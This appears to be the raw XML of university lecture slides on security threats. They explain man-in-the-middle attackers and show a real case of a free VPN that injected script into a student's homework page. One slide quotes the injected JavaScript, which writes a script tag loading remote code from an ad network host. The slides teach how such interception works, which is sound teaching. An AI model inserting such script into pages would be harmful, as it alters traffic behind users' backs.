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43"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId44"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="266" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="257" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="286" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="289" r:id="rId26"/>
    <p:sldId id="290" r:id="rId27"/>
    <p:sldId id="292" r:id="rId28"/>
    <p:sldId id="297" r:id="rId29"/>
    <p:sldId id="295" r:id="rId30"/>
    <p:sldId id="299" r:id="rId31"/>
    <p:sldId id="301" r:id="rId32"/>
    <p:sldId id="300" r:id="rId33"/>
    <p:sldId id="298" r:id="rId34"/>
    <p:sldId id="302" r:id="rId35"/>
    <p:sldId id="303" r:id="rId36"/>
    <p:sldId id="304" r:id="rId37"/>
    <p:sldId id="305" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="287" r:id="rId40"/>
    <p:sldId id="288" r:id="rId41"/>
    <p:sldId id="30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016" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="3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D8E8-F91B-4581-81BA-89EECC5744F3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25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58506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7A9111-D4C4-4F3A-AFC6-A58D829ACC0D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1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BAA-D2E5-4BDC-ACFE-12A359874A08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4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2303-9B5C-4E5D-9F74-8EDB90B2E2EE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4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B141-3785-4168-BE65-250C824D74ED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6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95832"/>
            <a:ext cx="10058400" cy="3566160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lang="en-US" sz="48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BBC-F454-4083-8752-4CC041464167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defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="74295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lang="en-US" dirty="0" smtClean="0"/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buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="◦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85750" lvl="1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85750" lvl="2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85750" lvl="3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85750" lvl="4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E49-7388-486A-B488-61FDCE431773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3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BBC-F454-4083-8752-4CC041464167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FFD9-12DB-420F-A8EC-9FA48B024A7C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4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447-A855-4311-B817-04833832EB8F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8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D25A-E039-4916-92A0-0BDA16E7A5A8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6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C650-BEA3-4500-8ADA-FC0885CC88C8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223808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3228"/>
            <a:ext cx="3200400" cy="4401976"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="233363" indent="-233363">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"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7A9111-D4C4-4F3A-AFC6-A58D829ACC0D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6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065AC3-E382-41E3-9C57-BF14BC968FFA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95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6" r:id="rId10"/>
    <p:sldLayoutId id="2147483682" r:id="rId11"/>
    <p:sldLayoutId id="2147483683" r:id="rId12"/>
    <p:sldLayoutId id="2147483684" r:id="rId1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3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95528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78408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61288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vaniea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54630037" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/how-syria-turned-off-the-internet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player.vimeo.com/video/54670123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54630037" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/how-syria-turned-off-the-internet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s://player.vimeo.com/video/5467012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54630037" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/how-syria-turned-off-the-internet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s://player.vimeo.com/video/5467012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dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ecurity Threats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Kami vaniea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>18 January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2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6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289300" y="1019745"/>
            <a:ext cx="4533900" cy="2209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00" y="1253107"/>
            <a:ext cx="1767500" cy="150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450" y="33394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Computer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050" y="33394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10650" y="333945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Website Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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2004295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omputer_desk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1276782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1731146" y="2073845"/>
            <a:ext cx="1558154" cy="1072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36173" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="user icon - vector Clip Art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Alice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23475" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15" descr="user icon - vector Clip Art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Bob</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1711346" y="4254970"/>
            <a:ext cx="847017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4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289300" y="1019745"/>
            <a:ext cx="4533900" cy="2209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00" y="1253107"/>
            <a:ext cx="1767500" cy="150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450" y="33394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Computer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050" y="33394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10650" y="333945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Website Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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2004295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omputer_desk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1276782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1731146" y="2073845"/>
            <a:ext cx="1558154" cy="1072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36173" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="user icon - vector Clip Art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Alice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23475" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15" descr="user icon - vector Clip Art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Bob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9922" y="4684882"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18" descr="user icon - vector Clip Art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Charlie</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1711346" y="4254970"/>
            <a:ext cx="3936623" cy="824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  <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6165095" y="4254970"/>
            <a:ext cx="4016427" cy="824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0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36173" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="user icon - vector Clip Art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Alice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23475" y="3860230"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15" descr="user icon - vector Clip Art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Bob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9922" y="4684882"/>
            <a:ext cx="833220" cy="1128033"/>
            <a:chOff x="7810500" y="563400"/>
            <a:chExt cx="580050" cy="785286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18" descr="user icon - vector Clip Art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Charlie</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1711346" y="4254970"/>
            <a:ext cx="3936623" cy="824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  <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6165095" y="4254970"/>
            <a:ext cx="4016427" cy="824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877331" y="464152"/>
            <a:ext cx="10971367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Charlie is in the middle between Alice and Bob. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Charlie can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>View traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delete traffic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008723" y="960406"/>
            <a:ext cx="6938210" cy="3658135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Charlie could be: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet service provider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virtual Private Network (VPN) provider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WIFI provider such as a coffee shop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attacker re-routing your connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An incompetent admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(it happens)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43452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00" y="2417762"/>
            <a:ext cx="1767500" cy="150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4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Computer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10650" y="1498600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Destination Server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02167" y="3238500"/>
            <a:ext cx="148713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Verizon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Three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63518" y="2933483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1" y="1266524"/>
            <a:ext cx="1767500" cy="150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4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Computer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88682" y="5975805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Destination Server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02167" y="3238500"/>
            <a:ext cx="148713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68418" y="2017712"/>
            <a:ext cx="1351273" cy="85145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Verizon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Three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63518" y="2933483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Comcast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819922" y="3009530"/>
            <a:ext cx="51687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41" y="4238147"/>
            <a:ext cx="1767500" cy="1502375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21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5449577" y="2922032"/>
            <a:ext cx="26914" cy="131611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36843" y="663431"/>
            <a:ext cx="137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VPN Server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022168" y="2114333"/>
            <a:ext cx="516878" cy="399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6960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1204 L 0.07852 0.01204 L 0.16081 -0.06111 L 0.21914 -0.09004 L 0.28529 -0.08842 L 0.35964 -0.03634 L 0.4405 -0.03912 L 0.56576 -0.18888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175 0.12292 L -0.20469 0.12037 L -0.28269 0.05301 L -0.31758 0.05301 L -0.31107 0.31459 L -0.31107 0.31459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is an attack that actually happened to a student of mine when they were trying to download/upload their “set a cookie” homework using a free VPN.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2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4056" y="542925"/>
            <a:ext cx="10783888" cy="26511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&lt;title&gt;Basic web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&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="http://vaniea.com/teaching/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>privacyToday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/basic.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="username=John Doe;";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&lt;body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>THIS TEXT HAS BEEN CHANGED.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&lt;/html&gt;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581322" y="543338"/>
            <a:ext cx="2024270" cy="113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Correct Answer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6993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84200" y="3194050"/>
            <a:ext cx="11023600" cy="38576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&lt;title&gt;Basic web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&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="http://vaniea.com/teaching/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>privacyToday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/basic.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/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&lt;script&gt;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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="username=John Doe;";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&lt;body&gt;&lt;script type="text/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"&gt;ANCHORFREE_VERSION="633161526"&lt;/script&gt;&lt;script type='text/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'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> _AF2$ = {'SN':'HSSHIELD00US','IP':'216.172.135.223','CH':'HSSCNL000550','CT':'z51','HST':'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sessStartTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=1422651433&amp;accessLP=1','AFH':'hss734','RN':Math.floor(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>()*999),'TOP':(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>parent.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)?0:1,'AFVER':'3.42','fbw':false,'FBWCNT':0,'FBWCNTNAME':'FBWCNT_FIREFOX','NOFBWNAME':'NO_FBW_FIREFOX','B':'f','VER': 'us'};if(_AF2$.TOP==1){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>='http://box.anchorfree.net/insert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>insert.php?sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.SN+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.CH+"&amp;v="+ANCHORFREE_VERSION+6+"&amp;b="+_AF2$.B+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.VER+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>afver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.AFVER+"' type='text/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'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;");}&lt;/script&gt;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THIS TEXT HAS BEEN CHANGED.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&lt;/body&gt;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&lt;/html&gt;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4056" y="542925"/>
            <a:ext cx="10783888" cy="26511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&lt;title&gt;Basic web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&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="http://vaniea.com/teaching/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>privacyToday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/basic.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="username=John Doe;";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&lt;body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	THIS TEXT HAS BEEN CHANGED.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&lt;/html&gt;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00" y="2915478"/>
            <a:ext cx="11062252" cy="79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581322" y="543338"/>
            <a:ext cx="2024270" cy="113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Correct Answer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581322" y="3286537"/>
            <a:ext cx="2024270" cy="113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Attacked Answer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3045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84200" y="3194050"/>
            <a:ext cx="11023600" cy="38576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&lt;title&gt;Basic web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&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="http://vaniea.com/teaching/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>privacyToday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/basic.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/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&lt;script&gt;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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="username=John Doe;";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&lt;body&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;ANCHORFREE_VERSION="633161526"&lt;/script&gt;&lt;script type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> _AF2$ = {'SN':'HSSHIELD00US','IP':'216.172.135.223','CH':'HSSCNL000550','CT':'z51','HST':'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessStartTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1422651433&amp;accessLP=1','AFH':'hss734','RN':Math.floor(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Math.random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()*999),'TOP':(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
